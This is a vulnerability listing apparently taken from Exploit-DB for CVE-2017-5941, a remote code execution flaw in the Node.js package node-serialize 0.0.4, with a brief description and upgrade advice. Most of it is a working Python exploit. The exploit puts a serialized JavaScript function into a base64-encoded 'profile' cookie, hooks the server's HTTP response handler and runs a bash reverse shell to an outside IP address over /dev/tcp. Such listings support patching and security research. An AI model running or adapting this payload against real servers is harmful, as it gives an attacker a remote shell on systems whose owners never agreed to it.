Node.JS - 'node-serialize' Remote Code Execution (2)

vendor:

node-serialize

by:

UndeadLarva

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: node-serialize

Affected Version From: 0.0.4

Affected Version To: 0.0.4

Patch Exists: YES

Related CWE: CVE-2017-5941

CPE: a:node-serialize:node-serialize

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2017

Node.JS – ‘node-serialize’ Remote Code Execution (2)

A vulnerability in the Node.js module 'node-serialize' allows remote attackers to execute arbitrary code. The vulnerability is due to the use of the 'eval' function to deserialize user-supplied data. An attacker can exploit this vulnerability by sending a malicious serialized object to the application. This can result in arbitrary code execution on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the node-serialize module.

Source

Exploit-DB raw data:

# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Author: UndeadLarva
# Software Link: https://www.npmjs.com/package/node-serialize
# Version: 0.0.4
# CVE: CVE-2017-5941

import requests
import re
import base64
import sys

url = 'http://192.168.100.133:8000/' # change this

payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
"return function () {"
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
"console.log('still inside');"
"const { exec } = require('child_process');"
"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
"}"
"})(require('http').ServerResponse.prototype.end)")

# rce = "_$$ND_FUNC$$_process.exit(0)"
# code ="_$$ND_FUNC$$_console.log('behind you')"
code = "_$$ND_FUNC$$_" + payload

string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'

cookie = {'profile':base64.b64encode(string)}

try:
    response = requests.get(url, cookies=cookie).text
    print response
except requests.exceptions.RequestException as e:
    print('Oops!')
    sys.exit(1)